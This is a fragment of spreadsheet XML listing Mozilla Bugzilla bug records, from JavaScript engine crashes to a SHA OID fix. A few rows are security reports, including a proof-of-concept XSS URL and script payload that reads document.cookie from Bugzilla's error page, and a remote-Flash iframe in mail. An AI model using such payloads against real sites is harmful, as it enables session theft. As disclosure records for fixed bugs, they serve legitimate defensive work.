          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5902" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J5902" t="inlineStr">
        <is>
          <t>Tracing Virtual Machine</t>
        </is>
      </c>
      <c r="K5902" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5902" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5902" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5902" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5902" t="inlineStr"/>
      <c r="Q5902" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5902" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5902" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5902" t="n">
        <v>1</v>
      </c>
      <c r="U5902" t="n">
        <v>0</v>
      </c>
      <c r="V5902" t="n">
        <v>7</v>
      </c>
      <c r="W5902" t="inlineStr">
        <is>
          <t>Each MethodEnv captures a scope chain for an underlying function.  IL is currently (wrongly) associated with MethodEnv rather than the underlying code, so we end up duplicating IL for the function.
This is unbounded duplication.  Tracing magnifies the problem because if the functions call a hot subroutine, the many closures look like many call sites, causing much inlining, or if the subroutine has a loop, high fan-out on the path exiting the loop back to the caller.
ESC on TT demonstrates this problem with Hashtable.read() calling eqfn() to compare strings</t>
        </is>
      </c>
      <c r="X5902" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5903">
      <c r="A5903" t="n">
        <v>660517</v>
      </c>
      <c r="B5903" t="inlineStr">
        <is>
          <t>2011-05-28 23:42:10 -0700</t>
        </is>
      </c>
      <c r="C5903" t="inlineStr">
        <is>
          <t>"ASSERTION: unable to transplant wrappers, probably OOM"</t>
        </is>
      </c>
      <c r="D5903" t="inlineStr">
        <is>
          <t>2013-12-27 14:30:57 -0800</t>
        </is>
      </c>
      <c r="E5903" t="n">
        <v>1</v>
      </c>
      <c r="F5903" t="n">
        <v>1</v>
      </c>
      <c r="G5903" t="n">
        <v>3</v>
      </c>
      <c r="H5903" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5903" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5903" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5903" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5903" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5903" t="inlineStr">
        <is>
          <t>[sg:critical?] [landed m-c 6/27] [JST likes] fixed-in-tracemonkey [qa-]</t>
        </is>
      </c>
      <c r="Q5903" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5903" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5903" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T5903" t="n">
        <v>1</v>
      </c>
      <c r="U5903" t="n">
        <v>0</v>
      </c>
      <c r="V5903" t="n">
        <v>18</v>
      </c>
      <c r="W5903" t="inlineStr">
        <is>
          <t>Created attachment 535905
testcase
###!!! ASSERTION: unable to transplant wrappers, probably OOM: 'Error', file dom/base/nsGlobalWindow.cpp, line 2096
(It's not OOM.)
And there are also several errors from chrome code in tabbrowser.xml and nsLoginManager.js, which is worrisome:
JavaScript error: , line 0: uncaught exception: [Exception... "Could not convert Native argument arg 0 [nsIWebProgress.DOMWindow]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  location: "JS frame :: chrome://browser/content/tabbrowser.xml :: &lt;TOP_LEVEL&gt; :: line 605"  data: no]
[Exception... "Could not convert Native argument arg 0 [nsIWebProgress.DOMWindow]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  location: "JS frame :: resource:///components/nsLoginManager.js :: &lt;TOP_LEVEL&gt; :: line 285"  data: no]
JavaScript error: , line 0: uncaught exception: [Exception... "Could not convert Native argument arg 0 [nsIWebProgress.DOMWindow]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  location: "JS frame :: chrome://browser/content/tabbrowser.xml :: &lt;TOP_LEVEL&gt; :: line 547"  data: no]</t>
        </is>
      </c>
      <c r="X5903" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5904">
      <c r="A5904" t="n">
        <v>371976</v>
      </c>
      <c r="B5904" t="inlineStr">
        <is>
          <t>2007-02-27 10:09:33 -0800</t>
        </is>
      </c>
      <c r="C5904" t="inlineStr">
        <is>
          <t>execution of flash in seamonkey mail</t>
        </is>
      </c>
      <c r="D5904" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5904" t="n">
        <v>1</v>
      </c>
      <c r="F5904" t="n">
        <v>1</v>
      </c>
      <c r="G5904" t="n">
        <v>3</v>
      </c>
      <c r="H5904" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5904" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5904" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5904" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5904" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5904" t="inlineStr">
        <is>
          <t>[sg:vector-critical] mail worms, what fun!</t>
        </is>
      </c>
      <c r="Q5904" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5904" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5904" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5904" t="n">
        <v>1</v>
      </c>
      <c r="U5904" t="n">
        <v>0</v>
      </c>
      <c r="V5904" t="n">
        <v>99</v>
      </c>
      <c r="W5904" t="inlineStr">
        <is>
          <t>reading html message in seamonkey containing:
&lt;iframe src='http://server/flash.swf'&gt;&lt;/html&gt;
causes exection of flash in preview pane if remote content
is shown.
replying to the message causes execution of flash in editor.
flash fails to load javascript uris.
data:application/x-shockwave-flash;base64, uris instantiate
the flash plugin but don't show the content (same applies to
browser, probably a bug).
active content in email in general is not very good idea.</t>
        </is>
      </c>
      <c r="X5904" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5905">
      <c r="A5905" t="n">
        <v>452692</v>
      </c>
      <c r="B5905" t="inlineStr">
        <is>
          <t>2008-08-28 15:24:18 -0700</t>
        </is>
      </c>
      <c r="C5905" t="inlineStr">
        <is>
          <t>Wrong OIDs for SHA-256, SHA-384, and SHA-512.</t>
        </is>
      </c>
      <c r="D5905" t="inlineStr">
        <is>
          <t>2008-09-02 10:48:58 -0700</t>
        </is>
      </c>
      <c r="E5905" t="n">
        <v>1</v>
      </c>
      <c r="F5905" t="n">
        <v>1</v>
      </c>
      <c r="G5905" t="n">
        <v>6</v>
      </c>
      <c r="H5905" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5905" t="inlineStr">
        <is>
          <t>JSS Graveyard</t>
        </is>
      </c>
      <c r="J5905" t="inlineStr">
        <is>
          <t>Library</t>
        </is>
      </c>
      <c r="K5905" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5905" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5905" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5905" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5905" t="inlineStr"/>
      <c r="Q5905" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5905" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5905" t="inlineStr">
        <is>
          <t>4.3</t>
        </is>
      </c>
      <c r="T5905" t="n">
        <v>1</v>
      </c>
      <c r="U5905" t="n">
        <v>0</v>
      </c>
      <c r="V5905" t="n">
        <v>4</v>
      </c>
      <c r="W5905" t="inlineStr">
        <is>
          <t>This bug was first reported on the dev-tech-crypto.lists.mozilla.org
mailing list by fercufer &lt;fercufer@gmail.com&gt;, and tracked down by
Jean-Marc Desperrier.
The official page of the OIDs for NIST algorithms is
http://csrc.nist.gov/groups/ST/crypto_apps_infra/csor/algorithms.html
It has this definition:
    hashAlgs OBJECT IDENTIFIER ::= { nistAlgorithms 2 }
Note that it ends in 2.
The corresponding JSS code is
http://mxr.mozilla.org/security/source/security/jss/org/mozilla/jss/asn1/OBJECT_IDENTIFIER.java#110
110     /**
111      * The OID space for FIPS-180-2 SHA256/SHA384/SHA512 standardized algorithms.
112      */
113     public static final OBJECT_IDENTIFIER HASH_ALGORITHM =
114         new OBJECT_IDENTIFIER( new long[] {2, 16, 840, 1, 101, 3, 4 } );
Note that it ends in 4.  That actually corresponds to nistAlgorithms:
    nistAlgorithms OBJECT IDENTIFIER ::= { csor nistAlgorithm(4) }
Line 114 should be changed to
114         new OBJECT_IDENTIFIER( new long[] {2, 16, 840, 1, 101, 3, 4, 2 } );</t>
        </is>
      </c>
      <c r="X5905" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5906">
      <c r="A5906" t="n">
        <v>852445</v>
      </c>
      <c r="B5906" t="inlineStr">
        <is>
          <t>2013-03-19 01:13:37 -0700</t>
        </is>
      </c>
      <c r="C5906" t="inlineStr">
        <is>
          <t>mime type detection truncates the first 32 bytes from attachments</t>
        </is>
      </c>
      <c r="D5906" t="inlineStr">
        <is>
          <t>2013-03-19 13:59:11 -0700</t>
        </is>
      </c>
      <c r="E5906" t="n">
        <v>1</v>
      </c>
      <c r="F5906" t="n">
        <v>1</v>
      </c>
      <c r="G5906" t="n">
        <v>4</v>
      </c>
      <c r="H5906" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5906" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5906" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5906" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L5906" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5906" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5906" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5906" t="inlineStr"/>
      <c r="Q5906" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5906" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5906" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T5906" t="n">
        <v>1</v>
      </c>
      <c r="U5906" t="n">
        <v>0</v>
      </c>
      <c r="V5906" t="n">
        <v>5</v>
      </c>
      <c r="W5906" t="inlineStr">
        <is>
          <t>from bug 848457
following bmo's 4.2 upgrade, when the mimetype is detected with file::mimeinfo::magic the first 32 bytes of the file were being removed from the uploaded data.
attach a file selecting 'auto detect' as the type, and ensure the file doesn't have a recognised file extension.</t>
        </is>
      </c>
      <c r="X5906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5907">
      <c r="A5907" t="n">
        <v>780778</v>
      </c>
      <c r="B5907" t="inlineStr">
        <is>
          <t>2012-08-06 16:57:18 -0700</t>
        </is>
      </c>
      <c r="C5907" t="inlineStr">
        <is>
          <t>Make sure we always release stuff on the right thread.</t>
        </is>
      </c>
      <c r="D5907" t="inlineStr">
        <is>
          <t>2013-03-18 13:05:38 -0700</t>
        </is>
      </c>
      <c r="E5907" t="n">
        <v>1</v>
      </c>
      <c r="F5907" t="n">
        <v>1</v>
      </c>
      <c r="G5907" t="n">
        <v>3</v>
      </c>
      <c r="H5907" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5907" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5907" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K5907" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5907" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5907" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5907" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5907" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5907" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5907" t="n">
        <v>1</v>
      </c>
      <c r="U5907" t="n">
        <v>0</v>
      </c>
      <c r="V5907" t="n">
        <v>12</v>
      </c>
      <c r="W5907" t="inlineStr">
        <is>
          <t>Created attachment 649478
Patch
Since some of the StructuredClone*Info structs can hold onto CCd objects, we need to be sure we always empty them on the main thread.</t>
        </is>
      </c>
      <c r="X5907" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5908">
      <c r="A5908" t="n">
        <v>197503</v>
      </c>
      <c r="B5908" t="inlineStr">
        <is>
          <t>2003-03-14 20:03:19 -0800</t>
        </is>
      </c>
      <c r="C5908" t="inlineStr">
        <is>
          <t>GRE Installer forcing a reboot during install</t>
        </is>
      </c>
      <c r="D5908" t="inlineStr">
        <is>
          <t>2008-07-31 01:16:09 -0700</t>
        </is>
      </c>
      <c r="E5908" t="n">
        <v>1</v>
      </c>
      <c r="F5908" t="n">
        <v>1</v>
      </c>
      <c r="G5908" t="n">
        <v>6</v>
      </c>
      <c r="H5908" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5908" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5908" t="inlineStr">
        <is>
          <t>Installer: GRE</t>
        </is>
      </c>
      <c r="K5908" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5908" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5908" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N5908" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5908" t="inlineStr"/>
      <c r="Q5908" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5908" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5908" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5908" t="n">
        <v>1</v>
      </c>
      <c r="U5908" t="n">
        <v>0</v>
      </c>
      <c r="V5908" t="n">
        <v>14</v>
      </c>
      <c r="W5908" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Build Identifier: 
When i upgraded from 1.0.2 to 1.3 it tells me i have to restart for 
installation to be complete, so i did, and it still gives me the error when i 
try opening mozilla. Yes i read another bug and there was a solution but what 
the hell is a .dif file gonna do? I have all my passwords stored on the browser 
and i have been waiting for this bug to be fixed. (i read the whole bug report 
and it had no explanation on what to do with the .dif file)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X5908" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5909">
      <c r="A5909" t="n">
        <v>350370</v>
      </c>
      <c r="B5909" t="inlineStr">
        <is>
          <t>2006-08-27 05:21:26 -0700</t>
        </is>
      </c>
      <c r="C5909" t="inlineStr">
        <is>
          <t>[FIX] Crash [@ nsStyleContext::FindChildWithRules] with ::first-line, appending rows and table-cells, etc</t>
        </is>
      </c>
      <c r="D5909" t="inlineStr">
        <is>
          <t>2013-01-26 16:45:34 -0800</t>
        </is>
      </c>
      <c r="E5909" t="n">
        <v>1</v>
      </c>
      <c r="F5909" t="n">
        <v>1</v>
      </c>
      <c r="G5909" t="n">
        <v>3</v>
      </c>
      <c r="H5909" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5909" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5909" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5909" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5909" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5909" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5909" t="inlineStr">
        <is>
          <t>[sg:critical][baking 8/29][reflow-refactor]</t>
        </is>
      </c>
      <c r="Q5909" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5909" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5909" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5909" t="n">
        <v>1</v>
      </c>
      <c r="U5909" t="n">
        <v>0</v>
      </c>
      <c r="V5909" t="n">
        <v>23</v>
      </c>
      <c r="W5909" t="inlineStr">
        <is>
          <t>See upcoming testcase, which crashes current branch (1.8.0.x and 1.8.1) and trunk builds.
It doesn't crash Mozilla1.7.13.
This seems to have regressed between 2005-01-03 and 2005-01-04:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-01-03+11&amp;maxdate=2005-01-04+08&amp;cvsroot=%2Fcvsroot
Maybe a regression from bug 271422 somehow?
Talkback ID: TB22561642M
nsStyleContext::FindChildWithRules   nsStyleSet::GetContext   nsStyleSet::ReParentStyleContext   nsFrameManager::ReParentStyleContext   nsFirstLineFrame::PullOneFrame   nsLineLayout::ReflowFrame  
I have several in-between testcases, that crash in different areas, mostly in the style system. I can attach those, if wanted.</t>
        </is>
      </c>
      <c r="X5909" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5910">
      <c r="A5910" t="n">
        <v>272620</v>
      </c>
      <c r="B5910" t="inlineStr">
        <is>
          <t>2004-12-01 10:25:08 -0800</t>
        </is>
      </c>
      <c r="C5910" t="inlineStr">
        <is>
          <t>XSS vulnerability in internal error messages</t>
        </is>
      </c>
      <c r="D5910" t="inlineStr">
        <is>
          <t>2023-10-22 22:23:21 -0700</t>
        </is>
      </c>
      <c r="E5910" t="n">
        <v>1</v>
      </c>
      <c r="F5910" t="n">
        <v>1</v>
      </c>
      <c r="G5910" t="n">
        <v>4</v>
      </c>
      <c r="H5910" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5910" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5910" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5910" t="inlineStr">
        <is>
          <t>2.17.6</t>
        </is>
      </c>
      <c r="L5910" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5910" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5910" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5910" t="inlineStr">
        <is>
          <t>[ready for 2.16.8] [ready for 2.18] [ready for 2.20rc1]</t>
        </is>
      </c>
      <c r="Q5910" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5910" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5910" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5910" t="n">
        <v>1</v>
      </c>
      <c r="U5910" t="n">
        <v>0</v>
      </c>
      <c r="V5910" t="n">
        <v>37</v>
      </c>
      <c r="W5910" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Build Identifier: 
If bugzilla.mozilla.org runs into in internal error it dumps out a notice to 
send the requested url to an admin. This is done using a line of javascript:
document.write("&lt;p&gt;URL: " + document.location + "&lt;/p&gt;")
Since Internet Explorer and some other browsers do not force proper URL 
encoding you can easily force an error and inject arbitrary javascript code:
https://bugzilla.mozilla.org/attachment.cgi?
id=&amp;action=force_internal_error&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Bugzilla does not understand the action parameter, raises an internal error and 
this leads to an XSS. This can be used to steal the session cookie or fake 
content on the website.
Mozilla/Firefox users seem to be not vulnerable since the browser automaticly 
converts &lt; into %3C before sending the request.
Reproducible: Always
Steps to Reproduce:
Just open the link in Internet Explorer or create a page like this:
&lt;script language="javascript" type="text/javascript"&gt; 
location = 'https://bugzilla.mozilla.org/attachment.cgi?
id=&amp;action=force_internal_error&lt;script&gt;alert(document.cookie)&lt;\/script&gt;'
&lt;/script&gt;</t>
        </is>
      </c>
      <c r="X5910" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5911">
      <c r="A5911" t="n">
        <v>689892</v>
      </c>
      <c r="B5911" t="inlineStr">
        <is>
          <t>2011-09-28 03:26:18 -0700</t>
        </is>
      </c>
      <c r="C5911" t="inlineStr">
        <is>
          <t>Assertion failure: isInterpreted(), at ../../jsfun.h:199 or Crash [@ js::gc::Cell::compartment]</t>
        </is>
      </c>
      <c r="D5911" t="inlineStr">
        <is>
          <t>2013-01-19 14:13:35 -0800</t>
        </is>
      </c>
      <c r="E5911" t="n">
        <v>1</v>
      </c>
      <c r="F5911" t="n">
        <v>1</v>
      </c>
      <c r="G5911" t="n">
        <v>3</v>
      </c>
      <c r="H5911" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5911" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5911" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5911" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5911" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5911" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5911" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5911" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q5911" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5911" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5911" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T5911" t="n">
        <v>1</v>
      </c>
      <c r="U5911" t="n">
        <v>0</v>
      </c>
      <c r="V5911" t="n">
        <v>14</v>
      </c>
      <c r="W5911" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision 7f4867717226 (options -m -n -a):
function foo2(x, n) {
  var i = 0;
  while (--n &gt;= 0) {
    x[i++] = 0;
  }
}
foo2([1,0Xae ,3,4,5],('0123456'));
Stepping through the assert crashes:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000412a94 in js::gc::Cell::compartment (this=0xfff8800000000000) at ../../jsgc.h:809
809         return arenaHeader()-&gt;compartment;
(gdb) bt
#0  0x0000000000412a94 in js::gc::Cell::compartment (this=0xfff8800000000000) at ../../jsgc.h:809
#1  0x00000000006e2a0e in PopActiveVMFrame (f=...) at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:143
#2  0x00000000006e2abd in JaegerTrampolineReturn () at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:153
#3  0x00007ffff7f61368 in ?? ()
#4  0x0000000000000001 in ?? ()
#5  0x0000000000000000 in ?? ()</t>
        </is>
      </c>
      <c r="X5911" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5912">
      <c r="A5912" t="n">
        <v>1886598</v>
      </c>
      <c r="B5912" t="inlineStr">
        <is>
          <t>2024-03-20 13:42:47 -0700</t>
        </is>
      </c>
      <c r="C5912" t="inlineStr">
        <is>
          <t>Undefined behavior in ShmemCharMapHashEntry</t>
        </is>
      </c>
      <c r="D5912" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:44 -0700</t>
        </is>
      </c>
      <c r="E5912" t="n">
        <v>1</v>
      </c>
      <c r="F5912" t="n">
        <v>1</v>
      </c>
      <c r="G5912" t="n">
        <v>3</v>
      </c>
      <c r="H5912" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5912" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5912" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5912" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5912" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5912" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5912" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5912" t="inlineStr">
        <is>
          <t>[adv-main126+]</t>
        </is>
      </c>
      <c r="Q5912" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5912" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5912" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T5912" t="n">
        <v>1</v>
      </c>
      <c r="U5912" t="n">
        <v>0</v>
      </c>
      <c r="V5912" t="n">
        <v>10</v>
      </c>
      <c r="W5912" t="inlineStr">
        <is>
          <t>`ShmemCharMapHashEntry` (`gfx/thebes/gfxPlatformFontList.h`) invokes undefined behavior because it hasa `mozilla::fontlist::Pointer` which hasa `std::atomic&lt;uint32_t&gt;`, which is not guaranteed to be trivially copyable. Yet `ShmemCharMapHashEntry` is declared as `ALLOW_MEMMOVE = true`, which allows `nsHashtable` to move it using `memmove()` instead of by calling its move constructor/move assignment operator. `memcpy/memmove`ing is valid only for "trivially copyable" types; see C++ Standard N4750 s.6.7(1-3). Nothing in the Standard requires `std::atomic` to be trivially copyable, so this operation is UB. Indeed, `std::` classes can be implemented in any manner that produces the correct observable behavior, N4750 s.4.1.1, unless explicitly documented otherwise.
Source from `FIREFOX_123_0_1_RELEASE`:
(`gfx/thebes/gfxPlatformFontList.h`):
```
 89: class ShmemCharMapHashEntry final : public PLDHashEntryHdr {
 ...
127:   enum { ALLOW_MEMMOVE = true };
128: 
129:  private:
130:   // charMaps are stored in the shared memory that FontList objects point to,
131:   // and are never deleted until the FontList (all referencing font lists,
132:   // actually) have gone away.
...
134:   mozilla::fontlist::Pointer mCharMap;
...
136: };
```
(`gfx/thebes/SharedFontList.h`):
```
 28: struct Pointer {
 ...
101:   // We store the block index and the offset within the block as a single
102:   // atomic 32-bit value so we can safely modify a Pointer without other
103:   // processes seeing a broken (partially-updated) value.
104:   std::atomic&lt;uint32_t&gt; mBlockAndOffset;
105: };
```</t>
        </is>
      </c>
      <c r="X5912" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5913">
      <c r="A5913" t="n">
        <v>1843782</v>
      </c>
      <c r="B5913" t="inlineStr">
        <is>
          <t>2023-07-16 10:33:46 -0700</t>
        </is>
      </c>
      <c r="C5913" t="inlineStr">
        <is>
          <t>Firefox WebGL DrawElementsInstanced Heap-Buffer-Overflow Possibly leading to Sandbox Escape Vulnerability (Mesa VM driver / Linux)</t>
        </is>
      </c>
      <c r="D5913" t="inlineStr">
        <is>
          <t>2024-09-12 09:48:29 -0700</t>
        </is>
      </c>
      <c r="E5913" t="n">
        <v>1</v>
      </c>
      <c r="F5913" t="n">
        <v>1</v>
      </c>
      <c r="G5913" t="n">
        <v>3</v>
      </c>
      <c r="H5913" t="inlineStr">
        <is>
          <t>Components</t>
